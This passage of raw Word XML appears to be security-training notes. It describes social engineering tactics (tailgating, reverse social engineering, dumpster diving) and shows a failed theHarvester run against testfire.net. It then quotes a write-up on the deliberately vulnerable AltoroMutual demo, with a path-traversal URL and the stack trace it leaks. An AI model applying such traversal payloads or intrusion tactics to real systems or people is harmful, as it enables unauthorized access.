          <w:color w:val="349CAD"/>
          <w:sz w:val="22"/>
          <w:u w:val="single"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Elicitation</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="101213"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="432" w:before="270"/>
        <w:rPr>
          <w:color w:val="101213"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="101213"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Intrusion calls for the social engineer to blend into the environment with the way they dress and behave. Activities or places that bring the social engineer into contact with target employees is an excellent opportunity to elicit information. Proximity to the employees can provide opportunities for conversation, eavesdropping, or possibly even covert cloning of RFID cards/badges.</w:t>
      </w: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Heading2"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:spacing w:after="0" w:before="405"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:color w:val="303133"/>
          <w:sz w:val="48"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Tailgating</w:t>
      </w:r>
      <w:r/>
      <w:bookmarkStart w:id="8" w:name="_Toc0x4ct22zvdmv"/>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="432" w:before="270"/>
        <w:rPr>
          <w:color w:val="101213"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="101213"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Also referred to as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="349CAD"/>
          <w:sz w:val="22"/>
          <w:u w:val="single"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
        <w:instrText>HYPERLINK "http://www.pcmag.com/encyclopedia/term/49281/piggybacking"</w:instrText>
        <w:fldChar w:fldCharType="separate"/>
        <w:t/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="349CAD"/>
          <w:sz w:val="22"/>
          <w:u w:val="single"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Piggybacking</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="101213"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>, is one way for a person to actually gain access to a secured building even if it has smart-card passes or biometrics. Normally those security measures can prevent unauthorized personnel from entering buildings, systems, or networks. Unfortunately, people can be too helpful and allow individuals into a secured door by holding it open for them. Because the individual appears to still be searching for their pass (that wasn’t there to begin with). An ‘employee’ or ‘technician’ running to catch the door before it shuts works just as well and allows a social engineer to access an otherwise inaccessible place. The following is a video by CLA showing how easy it can be to piggyback/tailgate into a building.</w:t>
      </w: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Heading2"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:spacing w:after="0" w:before="405"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:color w:val="303133"/>
          <w:sz w:val="48"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Reverse Social Engineering</w:t>
      </w:r>
      <w:r/>
      <w:bookmarkStart w:id="9" w:name="_Toc0377ctcmz19f"/>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="432" w:before="270"/>
        <w:rPr>
          <w:color w:val="101213"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="349CAD"/>
          <w:sz w:val="22"/>
          <w:u w:val="single"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
        <w:instrText>HYPERLINK "https://www.social-engineer.org/wiki/archives/HowToGatherInfo/HowToGatherInfo-ReverseSE.html"</w:instrText>
        <w:fldChar w:fldCharType="separate"/>
        <w:t/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="349CAD"/>
          <w:sz w:val="22"/>
          <w:u w:val="single"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Reverse social engineering</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="101213"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the practice of having already accessed the goal machine or network and having rendered it unusable; then the social engineer can offer to “fix it.” A social engineer can also plant a rogue access point or attempt to access authorized areas with information received earlier from the telephone, emails or websites.</w:t>
      </w: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Heading2"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:spacing w:after="0" w:before="405"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:color w:val="303133"/>
          <w:sz w:val="48"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Dumpster Diving</w:t>
      </w:r>
      <w:r/>
      <w:bookmarkStart w:id="10" w:name="_Tocu20z3dym5sgm"/>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="432" w:before="270"/>
        <w:rPr>
          <w:color w:val="101213"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="101213"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Dumpster diving is simply the process of going through trash to find something of value. It could be things such as, medical records, resumes, photos and emails, bank statements, financial account details, information about software, and tech support logs. This information can then be used to leverage an attack against a target.  As with most forms of social engineering,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="101213"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="true"/>
          <w:color w:val="101213"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">“Working smarter, not harder” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="101213"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>is a good slogan. Doing hours of work brute-forcing a password or account number may be unnecessary. Especially when you can just obtain the same information from a discarded unshredded post-it note.</w:t>
      </w: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Normal"/>
        <w:pBdr/>
        <w:bidi w:val="false"/>
        <w:ind w:hanging="0" w:left="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="35475C"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:pBdr/>
        <w:bidi w:val="false"/>
        <w:ind w:hanging="0" w:left="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="35475C"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Roboto Bold" w:hAnsi="Roboto Bold" w:cs="Roboto Bold"/>
          <w:b w:val="true"/>
          <w:i w:val="false"/>
          <w:strike w:val="false"/>
          <w:color w:val="35475C"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Exploring Contemporary Trends and Advancements in Information Gathering</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:pBdr/>
        <w:bidi w:val="false"/>
        <w:ind w:hanging="0" w:left="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="35475C"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pP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In our ever-evolving digital landscape, the realm of information gathering is witnessing a profound transformation. Cutting-edge trends and technologies are reshaping the way data is collected, processed, and utilized. Notable among these trends is the growing integration of artificial intelligence (AI) and machine learning (ML) into the information-gathering process. AI-driven algorithms empower organizations to sift through vast data repositories, discern patterns, and make predictive analyses, facilitating more informed decision-making.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:pBdr/>
        <w:bidi w:val="false"/>
        <w:ind w:hanging="0" w:left="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="35475C"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pP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Blockchain technology, known for its trust and security features, is also making inroads into information gathering. It plays a pivotal role in ensuring data authenticity, an invaluable asset in data-sensitive industries.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:pBdr/>
        <w:bidi w:val="false"/>
        <w:ind w:hanging="0" w:left="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="35475C"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pP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Moreover, open-source intelligence (OSINT) has become a cornerstone of information gathering. Its fusion with advanced analytics tools enables real-time monitoring and extraction of valuable insights from publicly available data sources.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:pBdr/>
        <w:bidi w:val="false"/>
        <w:ind w:hanging="0" w:left="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="35475C"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:pBdr/>
        <w:bidi w:val="false"/>
        <w:ind w:hanging="0" w:left="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="35475C"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:strike w:val="false"/>
          <w:color w:val="35475C"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>In summary, these emerging trends and technologies are reshaping the information-gathering landscape, providing organizations with more effective, secure, and data-driven means to make informed decisions in a rapidly changing world.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:pBdr/>
        <w:bidi w:val="false"/>
        <w:ind w:hanging="0" w:left="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans Light" w:eastAsia="Open Sans Light" w:hAnsi="Open Sans Light" w:cs="Open Sans Light"/>
          <w:color w:val="35475C"/>
          <w:sz w:val="21"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">EMAIL FOOTPRINTING  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr/>
      </w:pP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┌─[user@parrot]─[~/Desktop/informer/theHarvester]</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$python3 theHarvester.py -d testfire.net -l 50 -b brave</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Read proxies.yaml from /home/user/.theHarvester/proxies.yaml</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_   _                                            _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 |_| |__   ___    /\  /\__ _ _ ____   _____  ___| |_ ___ _ __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 __|  _ \ / _ \  / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__|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 |_| | | |  __/ / __  / (_| | |   \ V /  __/\__ \ ||  __/ |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\__|_| |_|\___| \/ /_/ \__,_|_|    \_/ \___||___/\__\___|_|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theHarvester 4.4.4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Coded by Christian Martorella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Edge-Security Research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cmartorella@edge-security.com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Target: testfire.net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An exception has occurred: 400, message='Got more than 8190 bytes (10832) when reading Header value is too long.', url=URL('https://search.brave.com/search?q=%22testfire.net%22&amp;offset=0&amp;source=web&amp;show_local=0&amp;spellcheck=0')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An exception has occurred: 400, message='Got more than 8190 bytes (10832) when reading Header value is too long.', url=URL('https://search.brave.com/search?q=%22testfire.net%22&amp;offset=1&amp;source=web&amp;show_local=0&amp;spellcheck=0')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An exception has occurred: 400, message='Got more than 8190 bytes (10832) when reading Header value is too long.', url=URL('https://search.brave.com/search?q=%22testfire.net%22&amp;offset=2&amp;source=web&amp;show_local=0&amp;spellcheck=0')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An exception has occurred: 400, message='Got more than 8190 bytes (10832) when reading Header value is too long.', url=URL('https://search.brave.com/search?q=%22testfire.net%22&amp;offset=3&amp;source=web&amp;show_local=0&amp;spellcheck=0')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An exception has occurred: 400, message='Got more than 8190 bytes (10832) when reading Header value is too long.', url=URL('https://search.brave.com/search?q=%22testfire.net%22&amp;offset=4&amp;source=web&amp;show_local=0&amp;spellcheck=0')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An exception has occurred: 400, message='Got more than 8190 bytes (10832) when reading Header value is too long.', url=URL('https://search.brave.com/search?q=%22testfire.net%22&amp;offset=5&amp;source=web&amp;show_local=0&amp;spellcheck=0')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An exception has occurred: 400, message='Got more than 8190 bytes (10832) when reading Header value is too long.', url=URL('https://search.brave.com/search?q=%22testfire.net%22&amp;offset=6&amp;source=web&amp;show_local=0&amp;spellcheck=0')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An exception has occurred: 400, message='Got more than 8190 bytes (10832) when reading Header value is too long.', url=URL('https://search.brave.com/search?q=site:testfire.net&amp;offset=0&amp;source=web&amp;show_local=0&amp;spellcheck=0')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An exception has occurred: 400, message='Got more than 8190 bytes (10832) when reading Header value is too long.', url=URL('https://search.brave.com/search?q=site:testfire.net&amp;offset=1&amp;source=web&amp;show_local=0&amp;spellcheck=0')</w:t>
      </w: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xml:space="preserve">[*] Searching Brave. </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No IPs found.</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No emails found.</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 No hosts found.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>But,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:strike w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>https://blog.dornea.nu/2013/05/06/hacking-altoro-mutual/</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Heading2"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:spacing w:after="274" w:before="274"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Semibold" w:eastAsia="Source Sans Pro Semibold" w:hAnsi="Source Sans Pro Semibold" w:cs="Source Sans Pro Semibold"/>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="33"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Introduction</w:t>
      </w:r>
      <w:r/>
      <w:bookmarkStart w:id="11" w:name="_Toc18kb8lehgspj"/>
      <w:bookmarkEnd w:id="11"/>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AltoroMutual is an vulnerable-by-design web application created by WatchFire (now AppScan Standard) as a demo test application for their BlackBox Scanner. (Source:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Regular" w:eastAsia="Source Sans Pro Regular" w:hAnsi="Source Sans Pro Regular" w:cs="Source Sans Pro Regular"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
        <w:instrText>HYPERLINK "https://www.owasp.org/index.php/AltoroMutual"</w:instrText>
        <w:fldChar w:fldCharType="separate"/>
        <w:t/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Regular" w:eastAsia="Source Sans Pro Regular" w:hAnsi="Source Sans Pro Regular" w:cs="Source Sans Pro Regular"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>https://www.owasp.org/index.php/AltoroMutual</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Regular" w:eastAsia="Source Sans Pro Regular" w:hAnsi="Source Sans Pro Regular" w:cs="Source Sans Pro Regular"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>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The demo can be found at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Regular" w:eastAsia="Source Sans Pro Regular" w:hAnsi="Source Sans Pro Regular" w:cs="Source Sans Pro Regular"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
        <w:instrText>HYPERLINK "http://demo.testfire.net/"</w:instrText>
        <w:fldChar w:fldCharType="separate"/>
        <w:t/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Regular" w:eastAsia="Source Sans Pro Regular" w:hAnsi="Source Sans Pro Regular" w:cs="Source Sans Pro Regular"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>http://demo.testfire.net/</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Regular" w:eastAsia="Source Sans Pro Regular" w:hAnsi="Source Sans Pro Regular" w:cs="Source Sans Pro Regular"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:spacing w:after="274" w:before="274"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Semibold" w:eastAsia="Source Sans Pro Semibold" w:hAnsi="Source Sans Pro Semibold" w:cs="Source Sans Pro Semibold"/>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="33"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Vulnerabilities</w:t>
      </w:r>
      <w:r/>
      <w:bookmarkStart w:id="12" w:name="_Toch2pj70y4juxk"/>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:spacing w:after="257" w:before="257"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Semibold" w:eastAsia="Source Sans Pro Semibold" w:hAnsi="Source Sans Pro Semibold" w:cs="Source Sans Pro Semibold"/>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="25"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>/default.aspx?content=</w:t>
      </w:r>
      <w:r/>
      <w:bookmarkStart w:id="13" w:name="_Toch74kqcaxfey7"/>
      <w:bookmarkEnd w:id="13"/>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There is a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Bold" w:eastAsia="Source Sans Pro Bold" w:hAnsi="Source Sans Pro Bold" w:cs="Source Sans Pro Bold"/>
          <w:b w:val="true"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>file inclusion vulnerability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Regular" w:eastAsia="Source Sans Pro Regular" w:hAnsi="Source Sans Pro Regular" w:cs="Source Sans Pro Regular"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> which we’ll use for further investigation. URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Regular" w:eastAsia="Source Sans Pro Regular" w:hAnsi="Source Sans Pro Regular" w:cs="Source Sans Pro Regular"/>
          <w:i w:val="true"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
        <w:instrText>HYPERLINK "http://demo.testfire.net/default.aspx?content=../testing.txt"</w:instrText>
        <w:fldChar w:fldCharType="separate"/>
        <w:t/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Regular" w:eastAsia="Source Sans Pro Regular" w:hAnsi="Source Sans Pro Regular" w:cs="Source Sans Pro Regular"/>
          <w:i w:val="true"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>http://demo.testfire.net/default.aspx?content=../testing.txt</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Regular" w:eastAsia="Source Sans Pro Regular" w:hAnsi="Source Sans Pro Regular" w:cs="Source Sans Pro Regular"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> will show:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="538351"/>
        <w:tblW w:w="146849" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="329"/>
        <w:gridCol w:w="146520"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1929"/>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r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14652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An Error Has Occurred</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>Summary:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>Could not find file 'D:downloadsAltoroMutual_v6website  esting.txt'.</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>Error Message:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>System.IO.FileNotFoundException: Could not find file 'D:downloadsAltoroMutual_v6website esting.txt'. File name: 'D:downloadsAltoroMutual_v6website  esting.txt' at System.IO.__Error.WinIOError(Int32 errorCode, String maybeFullPath) at System.IO.FileStream.Init(String path, FileMode mode, FileAccess access, Int32 rights, Boolean useRights, FileShare share, Int32 bufferSize, FileOptions options, SECURITY_ATTRIBUTES secAttrs, String msgPath, Boolean bFromProxy) at System.IO.FileStream..ctor(String path, FileMode mode, FileAccess access, FileShare share, Int32 bufferSize, FileOptions options) at System.IO.StreamReader..ctor(String path, Encoding encoding, Boolean detectEncodingFromByteOrderMarks, Int32 bufferSize) at System.IO.StreamReader..ctor(String path) at System.IO.File.OpenText(String path) at Altoro.Default.LoadFile(String myFile) in d:downloadsAltoroMutual_v6websitedefault.aspx.cs:line 42 at Altoro.Default.Page_Load(Object sender, EventArgs e) in d:downloadsAltoroMutual_v6websitedefault.aspx.cs:line 70 at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) at System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) at System.Web.UI.Control.OnLoad(EventArgs e) at System.Web.UI.Control.LoadRecursive() at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)</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As you can see we have found the root path of the web application which is at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
          <w:color w:val="3D3D3D"/>
